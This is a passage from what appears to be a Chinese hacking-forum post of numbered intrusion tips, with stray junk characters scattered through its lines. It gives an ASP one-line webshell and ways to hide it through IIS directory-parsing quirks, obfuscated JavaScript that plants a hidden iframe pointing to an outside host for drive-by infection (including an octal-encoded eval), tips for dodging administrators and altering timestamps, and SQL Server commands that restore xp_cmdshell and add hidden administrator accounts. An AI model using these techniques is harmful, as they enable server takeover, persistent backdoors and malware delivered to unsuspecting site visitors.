4 I7 Q1 b9 E- P8 t8 b, Z1、建立非标准目录:mkdir images..\& k& l* X2 I8 F/ E1 q# r( i0 N
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
# x/ A1 I3 I3 v6 N; }. D$ S通过web访问ASP木马:http://ip/images../news.asp?action=login
4 |9 d g$ g S9 R- p如何删除非标准目录:rmdir images..\ /s
3 N0 C% |- Y, ~- O' y2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
. _* ~; e3 |0 f/ W9 O3 kmkdir programme.asp9 _9 c5 h% c. d; s8 _. v3 C+ D
新建1.txt文件内容:<!--#include file=”12.jpg”-->: I6 ?6 c# C( _( D
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
& J; c! Z, [& a3 L0 Jattrib +H +S programme.asp
' s: N9 N: @& A8 e通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
/ V7 w$ G0 ^" K3 \/ n" L
+ N( X/ X6 M- R$ x54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。" X: F/ p5 F2 _
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
% P; T# l H$ k2 H$ [/ M# }* g
6 Z; b4 P, U, ?, L6 _) B55、JS隐蔽挂马, W9 o1 v; }; }& @
1.! }% m8 w `0 {) h& W0 s
var tr4c3="<iframe src=ht";& A( i! z1 }# Q& n8 Q: s" P
tr4c3 = tr4c3+"tp:/";( K1 h6 ~$ G; k2 ]9 X
tr4c3 = tr4c3+"/ww";
3 w$ k% h# |8 f& M6 btr4c3 = tr4c3+"w.tr4";3 ~5 m6 I3 u3 K" W
tr4c3 = tr4c3+"c3.com/inc/m";
% `4 p9 ?/ M. w: R. c" ptr4c3 = tr4c3+"m.htm style="display:none"></i";
! x4 U7 B7 J8 C1 Xtr4c3 =tr4c3+"frame>'";1 o) w$ y/ e2 u/ a7 ^
document.write(tr4c3);0 A7 f2 n. F2 |) `
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
! k8 S0 }3 C: f) Z- W' z
1 A( c: V$ G3 D% O2 u* Q. U2.
7 T. C# }+ k: Y, I转换进制,然后用EVAL执行。如
2 i0 J0 \' B( G8 z- `eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73"); t* [0 Q: s0 Z" o3 j+ q: y3 W' @3 z
不过这个有点显眼。
0 Y6 B' a+ s6 @' R3." s% N& z( l; T7 n# ]* k
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
/ G6 T7 `9 C8 K最后一点,别忘了把文件的时间也修改下。1 |# X! t) n/ Y& v# O- e
2 J* \' P) `% n8 z6 v
56.3389终端入侵常用DOS命令& n$ z* F q' @9 k+ z& U. r3 P8 d
taskkill taskkill /PID 1248 /t3 s% t; n9 G+ Z% \( K
4 n4 `3 [3 F, m/ ?) Z; X! J9 c, }
tasklist 查进程
4 }8 O1 U R# \/ d7 w0 d: y9 \. O3 R* F- b
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
8 a( K/ i4 K) W- M2 Xiisreset /reboot% Q* i9 ^) m; L% f' W. w% r2 E9 X
tsshutdn /reboot /delay:1 重起服务器
7 g( p# n$ L' g: ?8 P5 S4 }) Z1 p# j2 b* t7 X# o+ l
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
% G W+ T( O! W& b, W8 i+ |" \. {$ T$ B$ ^- ~/ Q# s& u/ g J
query user 查看当前终端用户在线情况# t, D3 @# \& t7 y& h7 [9 Z* Z5 y
4 Q' \/ t; |5 T" v要显示有关所有会话使用的进程的信息,请键入:query process *
% [3 c8 X) v1 S
9 o$ u3 M$ d5 ?% H" ^要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
4 u: B4 V" g! `7 K' ^$ D9 ~0 }9 N$ w& U
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER28 A/ D! N7 }) w/ n ` `
3 @! _. r% b& c+ s要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
" Z( z; U/ \& s( E* L3 ?. Q G5 V$ c$ C
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启1 F- h1 I! c/ G2 K1 R% Y! m
! r8 R* n1 z9 I0 @
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统8 V; H6 i4 g+ ]/ L
) B* c. t9 R5 G \$ f- D6 C命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。4 R6 {8 t( P! w. j' W$ _+ z
6 |' \1 T! y# L f命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机: _2 ?4 s- L. n7 Z: L
0 `4 M3 E! `5 A& Y0 Y$ g56、在地址栏或按Ctrl+O,输入:
! u/ T, @' z' A" b( N& \/ b9 \javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
2 N" S V! q/ G/ |* N5 d& @1 y3 v) f/ L1 u1 R% g
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
; x" R1 m: T" d2 N6 _& `9 F
( R \2 {( ~: ^* n4 M& k57、net user的时候,是不能显示加$的用户,但是如果不处理的话,( x5 d/ t4 W# v# M4 \& C. B
用net localgroup administrators是可以看到管理组下,加了$的用户的。
% O$ M9 ^( t( N/ ~4 E1 A S9 d
58、 sa弱口令相关命令
1 \& J- ?, m3 g( a/ c4 I
4 T) t# [: m8 Y5 R' X9 p5 E& @一.更改sa口令方法:. ]' O* i: b+ m( P6 ]
用sql综合利用工具连接后,执行命令:( X" x) y! r2 S) O; [
exec sp_password NULL,'20001001','sa'% l4 K, Z: U3 s& X S, @
(提示:慎用!)5 x+ M( i5 w- ?. Q3 l1 S: Q
2 I( Y8 B& u" I
二.简单修补sa弱口令.
; e; Q7 \/ I: ?9 {, U' q- g/ d' l% y! s: d
方法1:查询分离器连接后执行:
; X3 E0 [* ~% v7 o& uif exists (select * from2 U" J4 h4 q v8 P& [8 K
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
" N% v$ p V' Z/ V9 M' rOBJECTPROPERTY(id, N'IsExtendedProc') = 1)9 e; Q9 X' u$ F$ a
7 Z; l6 N; u6 x* c" X; l
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
n1 X6 o' r( {- M$ C- H* A3 g; K6 R% z3 @) a+ A2 j
GO
' i2 J5 |: j& L0 S9 |- ~% I( k7 Q$ W, x
`& u" F2 K5 ^$ }然后按F5键命令执行完毕. L: w: F/ @/ q6 g: U- H
, K/ J8 K0 K: L/ a( q方法2:查询分离器连接后" f3 B# N: z2 a6 x
第一步执行:use master6 ]% `% j) {) ]5 n- b! h/ |" P
第二步执行:sp_dropextendedproc 'xp_cmdshell'
* P. v$ D) J5 G5 t然后按F5键命令执行完毕
! C6 P* b5 ~) |: I1 l% w: k' G/ t; @, k5 v" h0 N
1 w1 \6 v) ^' m* ~1 G3 N三.常见情况恢复执行xp_cmdshell.
8 B A3 R3 |& [+ M o' U9 f' P/ _8 g% ~" t3 ~& ]+ j
( f) x7 Y, B A# ~
1 未能找到存储过程'master..xpcmdshell'.
5 A; U8 o5 |0 m1 ~0 ]$ e4 | 恢复方法:查询分离器连接后,
( V4 n' z* f0 P" R第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
' `# ]. z) Y2 f5 x, e) i第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll') {2 ^8 V k. @% ?" p$ r
然后按F5键命令执行完毕
9 n; Q- m% j) j) @% @
) T7 @5 m Q. e. b2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
1 h$ e8 ^: Y5 @7 v9 s恢复方法:查询分离器连接后,
4 e7 f; A" d+ i: ~; w第一步执行:sp_dropextendedproc "xp_cmdshell"
7 h+ `. I& p: U* ^/ f' `( M( Y第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
; |, y3 l y* e! e然后按F5键命令执行完毕
) h6 Y% |8 [- R1 X3 v5 n0 Z8 c; G1 F5 q `1 i6 C
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)! K) F" E! Z! I; v1 n/ M) Q
恢复方法:查询分离器连接后,
1 A- G/ I9 D4 b6 s第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
# w* W. m: ~& H9 ^' u第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
# v3 K. d4 B9 v2 R _ i然后按F5键命令执行完毕 q' d9 a$ H( s
& y: b7 G1 g$ C( h2 _$ K% R6 M3 Y7 l7 e1 r四.终极方法.
6 |3 G1 b3 O0 ]如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: j' S% J1 h5 ~
查询分离器连接后,
0 T: z7 J( ?2 K2000servser系统:; ]9 b6 M) \0 t( k2 V1 \0 O- @: ]% r" d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
) W/ K' Y, C( S2 m( S, H0 A' x# Z" Z8 G4 D6 O1 g* b
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
* m# ~% y8 W; b* {
" Y, C. [+ C$ O: Axp或2003server系统:
8 e3 G% |% v1 Y# J% L3 P9 s$ U) v$ j6 V
( f/ j% p9 i; U8 a5 M% J0 q$ _( u- odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
0 X* s5 M3 r. H* a, t) t
3 d s% E) ]9 [9 cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
) v2 [1 L! ~- I+ V* U |
发表于 2012-9-15 14:51:03
收藏
支持
反对